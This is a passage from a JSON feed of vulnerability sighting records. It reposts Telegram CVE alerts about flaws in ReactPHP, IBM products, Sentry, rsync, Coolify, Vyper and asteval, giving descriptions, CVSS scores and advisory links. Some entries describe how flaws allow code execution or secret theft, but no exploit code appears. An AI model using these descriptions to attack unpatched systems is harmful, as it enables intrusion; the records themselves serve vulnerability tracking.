attackers to make logged in admin add Stored XSS payloads via a CSRF attack.\n\ud83d\udccf Published: 2025-01-27T06:30:26Z\n\ud83d\udccf Modified: 2025-01-27T06:30:26Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-13057\n2. https://wpscan.com/vulnerability/6f869a3d-1ac1-4d31-8fe5-9b9795b15b5b", "creation_timestamp": "2025-01-27T07:07:53.000000Z"}, {"uuid": "75f8b814-76f3-4f53-a629-c56d4e5d4344", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-95X4-J7VC-H8MF", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/2808", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-26044\n\ud83d\udd39 Description: react/http is an event-driven, streaming HTTP client and server implementation for ReactPHP.  Previous versions of ReactPHP's HTTP server component contain a potential DoS vulnerability that can cause high CPU load when processing large HTTP request bodies. This vulnerability has little to no impact on the default configuration, but can be exploited when explicitly using the RequestBodyBufferMiddleware with very large settings. This might lead to consuming large amounts of CPU time for processing requests and significantly delay or slow down the processing of legitimate user requests. This issue has been addressed in release 1.9.0. Users are advised to upgrade. Users unable to upgrade may keep the request body limited using RequestBodyBufferMiddleware with a sensible value which should mitigate the issue. An infrastructure or DevOps workaround could be to place a reverse proxy in front of the ReactPHP HTTP server to filter out any excessive HTTP request bodies.\n\n\ud83d\udccf Published: 2023-05-17T17:24:25.855Z\n\ud83d\udccf Modified: 2025-01-23T19:52:01.375Z\n\ud83d\udd17 References:\n1. https://github.com/reactphp/http/security/advisories/GHSA-95x4-j7vc-h8mf\n2. https://github.com/reactphp/http/commit/9681f764b80c45ebfb5fe2ea7da5bd3babfcdcfd", "creation_timestamp": "2025-01-23T20:03:26.000000Z"}, {"uuid": "91c2d941-9860-40ed-b485-9a8dbb289f07", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M2FR-34QC-XRJJ", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3098", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-m2fr-34qc-xrjj\n\ud83d\udd25 CVSS Score: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n\ud83d\udd39 Description: IBM Cloud Pak System 2.3.3.0, 2.3.3.3, 2.3.3.3 iFix1, 2.3.3.4, 2.3.3.5, 2.3.3.6, 2.3.3.6 iFix1, 2.3.3.6 iFix2, 2.3.3.7, and 2.3.3.7 iFix1 could disclose sensitive information in HTTP responses that could aid in further attacks against the system.\n\ud83d\udccf Published: 2025-01-25T15:30:31Z\n\ud83d\udccf Modified: 2025-01-25T15:30:31Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2023-38013\n2. https://www.ibm.com/support/pages/node/7159533", "creation_timestamp": "2025-01-25T17:06:14.000000Z"}, {"uuid": "1f3bd2b9-d9ce-45f0-a355-81b26bdccf21", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-69MX-WR8G-Q7HC", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3147", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-69mx-wr8g-q7hc\n\ud83d\udd25 CVSS Score: 6.4 (CVSS_V3)\n\ud83d\udd39 Description: IBM Common Licensing 9.0  could allow an authenticated user to modify a configuration file that they should not have access to due to a broken authorization mechanism.\n\ud83d\udccf Published: 2025-01-26T18:30:32Z\n\ud83d\udccf Modified: 2025-01-26T18:30:32Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2023-50946\n2. https://www.ibm.com/support/pages/node/7161947", "creation_timestamp": "2025-01-26T19:07:27.000000Z"}, {"uuid": "acc4bcc6-e76f-41b3-b5e8-86d64b188b54", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X6GH-VHP5-7VPC", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3151", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-x6gh-vhp5-7vpc\n\ud83d\udd25 CVSS Score: 3.2 (CVSS_V3)\n\ud83d\udd39 Description: A vulnerability was found in Microword eScan Antivirus 7.0.32 on Linux. It has been rated as problematic. Affected by this issue is the function removeExtraSlashes of the file /opt/MicroWorld/sbin/rtscanner of the component Folder Watch List Handler. The manipulation leads to stack-based buffer overflow. The attack needs to be approached locally. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.\n\ud83d\udccf Published: 2025-01-27T00:31:29Z\n\ud83d\udccf Modified: 2025-01-27T00:31:29Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2025-0720\n2. https://vuldb.com/?ctiid.293480\n3. https://vuldb.com/?id.293480\n4. https://vuldb.com/?submit.482371", "creation_timestamp": "2025-01-27T01:06:54.000000Z"}, {"uuid": "4475472f-efb1-4494-aec0-7e9f48cfa0bb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R5W7-F542-Q2J4", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/3285", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-r5w7-f542-q2j4\n\ud83d\udd25 CVSS Score: 3.6 (CVSS_V3)\n\ud83d\udd39 Description: ### Impact\nThe [ContextLines integration](https://docs.sentry.io/platforms/javascript/guides/node/configuration/integrations/contextlines/) uses readable streams to more efficiently use memory when reading files. The ContextLines integration is used to attach source context to outgoing events.\n\nThe stream was not explicitly closed after use. This could lead to excessive amounts of file handles open on the system and potentially lead to a Denial of Service (DoS).\n\nThe ContextLines integration is enabled by default in the Node SDK (`@sentry/node`) and SDKs that run in Node.js environments (`@sentry/astro`, `@sentry/aws-serverless`, `@sentry/bun`, `@sentry/google-cloud-serverless`, `@sentry/nestjs`, `@sentry/nextjs`, `@sentry/nuxt`, `@sentry/remix`, `@sentry/solidstart`, `@sentry/sveltekit`).\n\n### Patches\n\nUsers should upgrade to version `8.49.0` or higher.\n\n### Workarounds\n\nTo remediate this issue in affected versions without upgrading to version `8.49.0` and above you can disable the ContextLines integration. See the [docs](https://docs.sentry.io/platforms/javascript/guides/node/configuration/integrations/#removing-a-default-integration) for more details.\n\n```js\nSentry.init({\n  // ...\n  integrations: function (integrations) {\n    // integrations will be all default integrations\n    return integrations.filter(function (integration) {\n      return integration.name !== \"ContextLines\";\n    });\n  },\n});\n```\n\nIf you disable the ContextLines integration, you will lose source context on your error events.\n\n### References\n- Reported issue: https://github.com/getsentry/sentry-javascript/issues/14892\n- PR Fix: https://github.com/getsentry/sentry-javascript/pull/14997\n\n\ud83d\udccf Published: 2025-01-28T20:37:26Z\n\ud83d\udccf Modified: 2025-01-28T20:37:49Z\n\ud83d\udd17 References:\n1. https://github.com/getsentry/sentry-javascript/security/advisories/GHSA-r5w7-f542-q2j4\n2. https://github.com/getsentry/sentry-javascript/issues/14892\n3. https://github.com/getsentry/sentry-javascript/pull/14997\n4. https://github.com/getsentry/sentry-javascript", "creation_timestamp": "2025-01-28T21:09:43.000000Z"}, {"uuid": "57b4d6e6-0170-4b4b-8e14-fbdc7ab61c06", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:0325", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3368", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-12085\n\ud83d\udd25 CVSS Score: 7.5 (CVSS_V3)\n\ud83d\udd39 Description: A flaw was found in the rsync daemon which could be triggered when rsync compares file checksums. This flaw allows an attacker to manipulate the checksum length (s2length) to cause a comparison between a checksum and uninitialized memory and leak one byte of uninitialized stack data at a time.\n\ud83d\udccf Published: 2025-01-14T18:32:00Z\n\ud83d\udccf Modified: 2025-01-29T09:31:42Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-12085\n2. https://access.redhat.com/errata/RHSA-2025:0324\n3. https://access.redhat.com/errata/RHSA-2025:0325\n4. https://access.redhat.com/errata/RHSA-2025:0637\n5. https://access.redhat.com/errata/RHSA-2025:0688\n6. https://access.redhat.com/errata/RHSA-2025:0714\n7. https://access.redhat.com/errata/RHSA-2025:0774\n8. https://access.redhat.com/errata/RHSA-2025:0787\n9. https://access.redhat.com/security/cve/CVE-2024-12085\n10. https://bugzilla.redhat.com/show_bug.cgi?id=2330539\n11. https://kb.cert.org/vuls/id/952657", "creation_timestamp": "2025-01-29T10:10:09.000000Z"}, {"uuid": "1a3caaa2-329f-4ba2-b163-fa9c11bbf36c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-939Q-9PXW-M29R", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3103", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-939q-9pxw-m29r\n\ud83d\udd25 CVSS Score: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N\n\ud83d\udd39 Description: IBM Maximo Application Suite 8.10.12, 8.11.0, 9.0.1, and 9.1.0 - Monitor Component does not neutralize output that is written to logs, which could allow an attacker to inject false log entries.\n\ud83d\udccf Published: 2025-01-25T15:30:31Z\n\ud83d\udccf Modified: 2025-01-25T15:30:31Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-35150\n2. https://www.ibm.com/support/pages/node/7180057", "creation_timestamp": "2025-01-25T17:06:21.000000Z"}, {"uuid": "461f55c7-b04d-4c73-9267-2e0546efa69c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C52R-R6J6-X3C5", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3102", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-c52r-r6j6-x3c5\n\ud83d\udd25 CVSS Score: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n\ud83d\udd39 Description: IBM Cloud Pak System 2.3.3.6, 2.3.36 iFix1, 2.3.3.6 iFix2, 2.3.3.7, 2.3.3.7 iFix1, and 2.3.4.0 could disclose sensitive information about the system that could aid in further attacks against the system.\n\ud83d\udccf Published: 2025-01-25T15:30:31Z\n\ud83d\udccf Modified: 2025-01-25T15:30:31Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2023-38716\n2. https://www.ibm.com/support/pages/node/7148474", "creation_timestamp": "2025-01-25T17:06:20.000000Z"}, {"uuid": "5bc9d333-dd78-45fc-85d5-cf0b3a3ab7e2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4WP5-FM78-39WQ", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3104", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-4wp5-fm78-39wq\n\ud83d\udd25 CVSS Score: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N\n\ud83d\udd39 Description: IBM Control Center 6.2.1 and 6.3.1 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system.\n\ud83d\udccf Published: 2025-01-25T15:30:31Z\n\ud83d\udccf Modified: 2025-01-25T15:30:31Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-35111\n2. https://www.ibm.com/support/pages/node/7174806", "creation_timestamp": "2025-01-25T17:06:22.000000Z"}, {"uuid": "f142d8e1-47bd-4a5a-bf5c-c419c287d529", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2CWP-85P5-6FWC", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3107", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-2cwp-85p5-6fwc\n\ud83d\udd25 CVSS Score: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N\n\ud83d\udd39 Description: IBM Control Center 6.2.1 and 6.3.1 \n\ncould allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system.\n\ud83d\udccf Published: 2025-01-25T15:30:31Z\n\ud83d\udccf Modified: 2025-01-25T15:30:31Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-35112\n2. https://www.ibm.com/support/pages/node/7174794", "creation_timestamp": "2025-01-25T17:06:27.000000Z"}, {"uuid": "0d7cd688-1081-454a-a2f8-40f66b5bb42c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8W24-GFGQ-JG72", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/2916", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-22607\n\ud83d\udd39 Description: Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. Prior to version 4.0.0-beta.361, the missing authorization allows any authenticated user to fetch the details page for any GitHub / GitLab configuration on a Coolify instance by only knowing the UUID of the model. This exposes the \"client id\", \"client secret\" and \"webhook secret.\" Version 4.0.0-beta.361 fixes this issue.\n\ud83d\udccf Published: 2025-01-24T15:45:03.711Z\n\ud83d\udccf Modified: 2025-01-24T15:58:23.987Z\n\ud83d\udd17 References:\n1. https://github.com/coollabsio/coolify/security/advisories/GHSA-8w24-gfgq-jg72", "creation_timestamp": "2025-01-24T16:04:36.000000Z"}, {"uuid": "21da3275-4ada-414f-ac53-d775d09d2799", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:9097", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5260", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-3727\n\ud83d\udd25 CVSS Score: 8.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in the github.com/containers/image library. This flaw allows attackers to trigger unexpected authenticated registry accesses on behalf of a victim user, causing resource exhaustion, local path traversal, and other attacks.\n\ud83d\udccf Published: 2024-05-09T14:57:21.327Z\n\ud83d\udccf Modified: 2025-02-25T08:07:16.415Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:0045\n2. https://access.redhat.com/errata/RHSA-2024:3718\n3. https://access.redhat.com/errata/RHSA-2024:4159\n4. https://access.redhat.com/errata/RHSA-2024:4613\n5. https://access.redhat.com/errata/RHSA-2024:4850\n6. https://access.redhat.com/errata/RHSA-2024:4960\n7. https://access.redhat.com/errata/RHSA-2024:5258\n8. https://access.redhat.com/errata/RHSA-2024:5951\n9. https://access.redhat.com/errata/RHSA-2024:6054\n10. https://access.redhat.com/errata/RHSA-2024:6122\n11. https://access.redhat.com/errata/RHSA-2024:6708\n12. https://access.redhat.com/errata/RHSA-2024:6818\n13. https://access.redhat.com/errata/RHSA-2024:6824\n14. https://access.redhat.com/errata/RHSA-2024:7164\n15. https://access.redhat.com/errata/RHSA-2024:7174\n16. https://access.redhat.com/errata/RHSA-2024:7182\n17. https://access.redhat.com/errata/RHSA-2024:7187\n18. https://access.redhat.com/errata/RHSA-2024:7922\n19. https://access.redhat.com/errata/RHSA-2024:7941\n20. https://access.redhat.com/errata/RHSA-2024:8260\n21. https://access.redhat.com/errata/RHSA-2024:8425\n22. https://access.redhat.com/errata/RHSA-2024:9097\n23. https://access.redhat.com/errata/RHSA-2024:9098\n24. https://access.redhat.com/errata/RHSA-2024:9102\n25. https://access.redhat.com/errata/RHSA-2024:9960\n26. https://access.redhat.com/security/cve/CVE-2024-3727\n27. https://bugzilla.redhat.com/show_bug.cgi?id=2274767", "creation_timestamp": "2025-02-25T08:25:24.000000Z"}, {"uuid": "fe2a4fc9-2adb-4f3c-8d23-7c1b4c72feba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:5951", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5260", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-3727\n\ud83d\udd25 CVSS Score: 8.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in the github.com/containers/image library. This flaw allows attackers to trigger unexpected authenticated registry accesses on behalf of a victim user, causing resource exhaustion, local path traversal, and other attacks.\n\ud83d\udccf Published: 2024-05-09T14:57:21.327Z\n\ud83d\udccf Modified: 2025-02-25T08:07:16.415Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:0045\n2. https://access.redhat.com/errata/RHSA-2024:3718\n3. https://access.redhat.com/errata/RHSA-2024:4159\n4. https://access.redhat.com/errata/RHSA-2024:4613\n5. https://access.redhat.com/errata/RHSA-2024:4850\n6. https://access.redhat.com/errata/RHSA-2024:4960\n7. https://access.redhat.com/errata/RHSA-2024:5258\n8. https://access.redhat.com/errata/RHSA-2024:5951\n9. https://access.redhat.com/errata/RHSA-2024:6054\n10. https://access.redhat.com/errata/RHSA-2024:6122\n11. https://access.redhat.com/errata/RHSA-2024:6708\n12. https://access.redhat.com/errata/RHSA-2024:6818\n13. https://access.redhat.com/errata/RHSA-2024:6824\n14. https://access.redhat.com/errata/RHSA-2024:7164\n15. https://access.redhat.com/errata/RHSA-2024:7174\n16. https://access.redhat.com/errata/RHSA-2024:7182\n17. https://access.redhat.com/errata/RHSA-2024:7187\n18. https://access.redhat.com/errata/RHSA-2024:7922\n19. https://access.redhat.com/errata/RHSA-2024:7941\n20. https://access.redhat.com/errata/RHSA-2024:8260\n21. https://access.redhat.com/errata/RHSA-2024:8425\n22. https://access.redhat.com/errata/RHSA-2024:9097\n23. https://access.redhat.com/errata/RHSA-2024:9098\n24. https://access.redhat.com/errata/RHSA-2024:9102\n25. https://access.redhat.com/errata/RHSA-2024:9960\n26. https://access.redhat.com/security/cve/CVE-2024-3727\n27. https://bugzilla.redhat.com/show_bug.cgi?id=2274767", "creation_timestamp": "2025-02-25T08:25:24.000000Z"}, {"uuid": "4cc87d08-a1c8-480d-86c9-9412d6a34355", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:7922", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5260", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-3727\n\ud83d\udd25 CVSS Score: 8.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in the github.com/containers/image library. This flaw allows attackers to trigger unexpected authenticated registry accesses on behalf of a victim user, causing resource exhaustion, local path traversal, and other attacks.\n\ud83d\udccf Published: 2024-05-09T14:57:21.327Z\n\ud83d\udccf Modified: 2025-02-25T08:07:16.415Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:0045\n2. https://access.redhat.com/errata/RHSA-2024:3718\n3. https://access.redhat.com/errata/RHSA-2024:4159\n4. https://access.redhat.com/errata/RHSA-2024:4613\n5. https://access.redhat.com/errata/RHSA-2024:4850\n6. https://access.redhat.com/errata/RHSA-2024:4960\n7. https://access.redhat.com/errata/RHSA-2024:5258\n8. https://access.redhat.com/errata/RHSA-2024:5951\n9. https://access.redhat.com/errata/RHSA-2024:6054\n10. https://access.redhat.com/errata/RHSA-2024:6122\n11. https://access.redhat.com/errata/RHSA-2024:6708\n12. https://access.redhat.com/errata/RHSA-2024:6818\n13. https://access.redhat.com/errata/RHSA-2024:6824\n14. https://access.redhat.com/errata/RHSA-2024:7164\n15. https://access.redhat.com/errata/RHSA-2024:7174\n16. https://access.redhat.com/errata/RHSA-2024:7182\n17. https://access.redhat.com/errata/RHSA-2024:7187\n18. https://access.redhat.com/errata/RHSA-2024:7922\n19. https://access.redhat.com/errata/RHSA-2024:7941\n20. https://access.redhat.com/errata/RHSA-2024:8260\n21. https://access.redhat.com/errata/RHSA-2024:8425\n22. https://access.redhat.com/errata/RHSA-2024:9097\n23. https://access.redhat.com/errata/RHSA-2024:9098\n24. https://access.redhat.com/errata/RHSA-2024:9102\n25. https://access.redhat.com/errata/RHSA-2024:9960\n26. https://access.redhat.com/security/cve/CVE-2024-3727\n27. https://bugzilla.redhat.com/show_bug.cgi?id=2274767", "creation_timestamp": "2025-02-25T08:25:24.000000Z"}, {"uuid": "8183f4b6-de9a-4d72-a46a-f565b05f97f4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9WQM-FG79-4748", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/2908", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-22605\n\ud83d\udd39 Description: Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. Starting in version 4.0.0-beta.18 and prior to 4.0.0-beta.253, a vulnerability in the execution of commands on remote servers allows an authenticated user to execute arbitrary code on the local Coolify container, gaining access to data and private keys or tokens of other users/teams. The ability to inject malicious commands into the Coolify container gives authenticated attackers the ability to fully retrieve and control the data and availability of the software. Centrally hosted Coolify instances (open registration and/or multiple teams with potentially untrustworthy users) are especially at risk, as sensitive data of all users and connected servers can be leaked by any user. Additionally, attackers are able to modify the running software, potentially deploying malicious images to remote nodes or generally changing its behavior. Version 4.0.0-beta.253 patches this issue.\n\ud83d\udccf Published: 2025-01-24T14:54:18.707Z\n\ud83d\udccf Modified: 2025-01-24T14:54:18.707Z\n\ud83d\udd17 References:\n1. https://github.com/coollabsio/coolify/security/advisories/GHSA-9wqm-fg79-4748\n2. https://github.com/coollabsio/coolify/pull/1524\n3. https://github.com/coollabsio/coolify/pull/1625\n4. https://github.com/coollabsio/coolify/commit/353245bb7de9680f238bae30443af1696bc977b0\n5. https://github.com/coollabsio/coolify/blob/40a239ddda3fc919f57a052d7b52b8e1a6696b81/bootstrap/helpers/remoteProcess.php#L70", "creation_timestamp": "2025-01-24T15:04:49.000000Z"}, {"uuid": "64fa92d2-6b73-4b87-bdcb-02aa5e2ebe1e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PH9X-4VC9-M39G", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/2919", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-32059\n\ud83d\udd39 Description: Vyper is a Pythonic smart contract language for the Ethereum virtual machine. Prior to version 0.3.8, internal calls with default arguments are compiled incorrectly. Depending on the number of arguments provided in the call, the defaults are added not right-to-left, but left-to-right. If the types are incompatible, typechecking is bypassed. The ability to pass kwargs to internal functions is an undocumented feature that is not well known about. The issue is patched in version 0.3.8.\n\ud83d\udccf Published: 2023-05-11T21:01:11.456Z\n\ud83d\udccf Modified: 2025-01-24T15:54:40.006Z\n\ud83d\udd17 References:\n1. https://github.com/vyperlang/vyper/security/advisories/GHSA-ph9x-4vc9-m39g\n2. https://github.com/vyperlang/vyper/commit/c3e68c302aa6e1429946473769dd1232145822ac", "creation_timestamp": "2025-01-24T16:04:38.000000Z"}, {"uuid": "09b3b28a-c81e-4989-9d04-f142c02e6c9e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-496V-9Q38-2X6C", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/2952", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-22610\n\ud83d\udd39 Description: Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. Prior to version 4.0.0-beta.361, the missing authorization allows any authenticated user to fetch the global coolify instance OAuth configuration. This exposes the \"client id\" and \"client secret\" for every custom OAuth provider. The attacker can also modify the global OAuth configuration. Version 4.0.0-beta.361 fixes the issue.\n\ud83d\udccf Published: 2025-01-24T16:33:17.058Z\n\ud83d\udccf Modified: 2025-01-24T16:33:17.058Z\n\ud83d\udd17 References:\n1. https://github.com/coollabsio/coolify/security/advisories/GHSA-496v-9q38-2x6c", "creation_timestamp": "2025-01-24T17:05:11.000000Z"}, {"uuid": "c5fe04e8-9a3d-43b5-9d0d-bcaa904f8b85", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6R8Q-PFPV-7CGJ", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/2918", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-32058\n\ud83d\udd39 Description: Vyper is a Pythonic smart contract language for the Ethereum virtual machine. Prior to version 0.3.8, due to missing overflow check for loop variables, by assigning the iterator of a loop to a variable, it is possible to overflow the type of the latter. The issue seems to happen only in loops of type `for i in range(a, a + N)` as in loops of type `for i in range(start, stop)` and `for i in range(stop)`, the compiler is able to raise a `TypeMismatch` when trying to overflow the variable. The problem has been patched in version 0.3.8.\n\ud83d\udccf Published: 2023-05-11T20:55:35.195Z\n\ud83d\udccf Modified: 2025-01-24T15:57:47.118Z\n\ud83d\udd17 References:\n1. https://github.com/vyperlang/vyper/security/advisories/GHSA-6r8q-pfpv-7cgj\n2. https://github.com/vyperlang/vyper/commit/3de1415ee77a9244eb04bdb695e249d3ec9ed868", "creation_timestamp": "2025-01-24T16:04:38.000000Z"}, {"uuid": "851d8c01-2a33-4ddb-909a-79c01556e370", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3WWR-3G9F-9GC7", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/2936", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-24359\n\ud83d\udd39 Description: ASTEVAL is an evaluator of Python expressions and statements. Prior to version 1.0.6, if an attacker can control the input to the `asteval` library, they can bypass asteval's restrictions and execute arbitrary Python code in the context of the application using the library. The vulnerability is rooted in how `asteval` performs handling of `FormattedValue` AST nodes. In particular, the `on_formattedvalue` value uses the dangerous format method of the str class. The code allows an attacker to manipulate the value of the string used in the dangerous call `fmt.format(__fstring__=val)`. This vulnerability can be exploited to access protected attributes by intentionally triggering an `AttributeError` exception. The attacker can then catch the exception and use its `obj` attribute to gain arbitrary access to sensitive or protected object properties. Version 1.0.6 fixes this issue.\n\ud83d\udccf Published: 2025-01-24T16:52:44.304Z\n\ud83d\udccf Modified: 2025-01-24T16:52:44.304Z\n\ud83d\udd17 References:\n1. https://github.com/lmfit/asteval/security/advisories/GHSA-3wwr-3g9f-9gc7\n2. https://github.com/lmfit/asteval/blob/cfb57f0beebe0dc0520a1fbabc35e66060c7ea71/asteval/asteval.py#L507\n3. https://lucumr.pocoo.org/2016/12/29/careful-with-str-format", "creation_timestamp": "2025-01-24T17:04:48.000000Z"}, {"uuid": "5725216f-8efd-4afb-a51d-65c9fa93b5b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V34R-VJ4R-38J6", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/2939", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: 